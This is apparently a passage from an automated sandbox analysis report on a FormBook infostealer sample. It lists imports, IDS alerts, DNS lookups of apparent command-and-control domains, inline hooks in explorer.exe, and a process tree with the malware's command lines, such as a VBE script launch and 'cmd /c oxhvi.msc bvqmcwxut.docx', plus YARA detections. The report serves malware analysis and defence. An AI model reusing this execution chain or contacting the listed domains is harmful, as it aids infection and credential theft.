                                                                                                                                                    KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA, FindNextFileA
                                                                                                                                                    OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                                                                                    gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                                                                                                    Possible Origin

                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                    EnglishUnited States

                                                                                                                                                    Network Behavior

                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                    2024-11-05T15:57:23.745966+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.849706TCP
                                                                                                                                                    2024-11-05T15:57:45.888405+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.858145TCP
                                                                                                                                                    2024-11-05T15:57:47.301900+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.858146TCP

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Nov 5, 2024 15:57:25.262123108 CET53534351.1.1.1192.168.2.8
                                                                                                                                                    Nov 5, 2024 15:57:39.935204983 CET5360125162.159.36.2192.168.2.8
                                                                                                                                                    Nov 5, 2024 15:57:40.559967041 CET5232853192.168.2.81.1.1.1
                                                                                                                                                    Nov 5, 2024 15:57:40.566946030 CET53523281.1.1.1192.168.2.8
                                                                                                                                                    Nov 5, 2024 15:57:42.355735064 CET5207253192.168.2.81.1.1.1
                                                                                                                                                    Nov 5, 2024 15:57:42.369263887 CET53520721.1.1.1192.168.2.8
                                                                                                                                                    Nov 5, 2024 15:58:02.924220085 CET6462153192.168.2.81.1.1.1
                                                                                                                                                    Nov 5, 2024 15:58:02.947779894 CET53646211.1.1.1192.168.2.8
                                                                                                                                                    Nov 5, 2024 15:58:22.693392038 CET5629153192.168.2.81.1.1.1
                                                                                                                                                    Nov 5, 2024 15:58:22.716519117 CET53562911.1.1.1192.168.2.8
                                                                                                                                                    Nov 5, 2024 15:58:43.271280050 CET5512753192.168.2.81.1.1.1
                                                                                                                                                    Nov 5, 2024 15:58:43.585354090 CET53551271.1.1.1192.168.2.8
                                                                                                                                                    Nov 5, 2024 15:59:03.569488049 CET5039853192.168.2.81.1.1.1
                                                                                                                                                    Nov 5, 2024 15:59:03.591702938 CET53503981.1.1.1192.168.2.8

                                                                                                                                                    DNS Queries

                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                    Nov 5, 2024 15:57:40.559967041 CET192.168.2.81.1.1.10x14d0Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                    Nov 5, 2024 15:57:42.355735064 CET192.168.2.81.1.1.10xf41eStandard query (0)212.20.149.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                    Nov 5, 2024 15:58:02.924220085 CET192.168.2.81.1.1.10xe347Standard query (0)www.arehouse-inventory-62571.bondA (IP address)IN (0x0001)false
                                                                                                                                                    Nov 5, 2024 15:58:22.693392038 CET192.168.2.81.1.1.10xa32bStandard query (0)www.lladinco.onlineA (IP address)IN (0x0001)false
                                                                                                                                                    Nov 5, 2024 15:58:43.271280050 CET192.168.2.81.1.1.10x4d26Standard query (0)www.inlinlong.topA (IP address)IN (0x0001)false
                                                                                                                                                    Nov 5, 2024 15:59:03.569488049 CET192.168.2.81.1.1.10xe0b0Standard query (0)www.reon-network.xyzA (IP address)IN (0x0001)false

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                    Nov 5, 2024 15:57:40.566946030 CET1.1.1.1192.168.2.80x14d0Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                    Nov 5, 2024 15:57:42.369263887 CET1.1.1.1192.168.2.80xf41eName error (3)212.20.149.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                    Nov 5, 2024 15:58:02.947779894 CET1.1.1.1192.168.2.80xe347Name error (3)www.arehouse-inventory-62571.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Nov 5, 2024 15:58:22.716519117 CET1.1.1.1192.168.2.80xa32bName error (3)www.lladinco.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Nov 5, 2024 15:58:43.585354090 CET1.1.1.1192.168.2.80x4d26Name error (3)www.inlinlong.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Nov 5, 2024 15:59:03.591702938 CET1.1.1.1192.168.2.80xe0b0Name error (3)www.reon-network.xyznonenoneA (IP address)IN (0x0001)false

                                                                                                                                                    Code Manipulations

                                                                                                                                                    User Modules

                                                                                                                                                    Hook Summary

                                                                                                                                                    Function NameHook TypeActive in Processes
                                                                                                                                                    PeekMessageAINLINEexplorer.exe
                                                                                                                                                    PeekMessageWINLINEexplorer.exe
                                                                                                                                                    GetMessageWINLINEexplorer.exe
                                                                                                                                                    GetMessageAINLINEexplorer.exe

                                                                                                                                                    Processes

                                                                                                                                                    Process: explorer.exe, Module: user32.dll
                                                                                                                                                    Function NameHook TypeNew Data
                                                                                                                                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE3
                                                                                                                                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE3
                                                                                                                                                    GetMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE3
                                                                                                                                                    GetMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE3

                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Target ID:0
                                                                                                                                                    Start time:09:57:04
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\M1Y6kc9FpE.exe"
                                                                                                                                                    Imagebase:0xa20000
                                                                                                                                                    File size:1'050'479 bytes
                                                                                                                                                    MD5 hash:7D8165E194302250D880425B1608E307
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:2
                                                                                                                                                    Start time:09:57:08
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe"
                                                                                                                                                    Imagebase:0xed0000
                                                                                                                                                    File size:147'456 bytes
                                                                                                                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:3
                                                                                                                                                    Start time:09:57:18
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                                                                                                                                    Imagebase:0xa40000
                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:4
                                                                                                                                                    Start time:09:57:18
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:5
                                                                                                                                                    Start time:09:57:18
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c oxhvi.msc bvqmcwxut.docx
                                                                                                                                                    Imagebase:0xa40000
                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:6
                                                                                                                                                    Start time:09:57:19
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:7
                                                                                                                                                    Start time:09:57:19
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:ipconfig /release
                                                                                                                                                    Imagebase:0xa70000
                                                                                                                                                    File size:29'184 bytes
                                                                                                                                                    MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:8
                                                                                                                                                    Start time:09:57:19
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:oxhvi.msc bvqmcwxut.docx
                                                                                                                                                    Imagebase:0x530000
                                                                                                                                                    File size:947'288 bytes
                                                                                                                                                    MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                    Reputation:moderate
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:10
                                                                                                                                                    Start time:09:57:22
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /renew
                                                                                                                                                    Imagebase:0xa40000
                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:11
                                                                                                                                                    Start time:09:57:22
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:12
                                                                                                                                                    Start time:09:57:22
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:ipconfig /renew
                                                                                                                                                    Imagebase:0xa70000
                                                                                                                                                    File size:29'184 bytes
                                                                                                                                                    MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:15
                                                                                                                                                    Start time:09:57:29
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                                                                                                                                    Imagebase:0xc40000
                                                                                                                                                    File size:45'984 bytes
                                                                                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
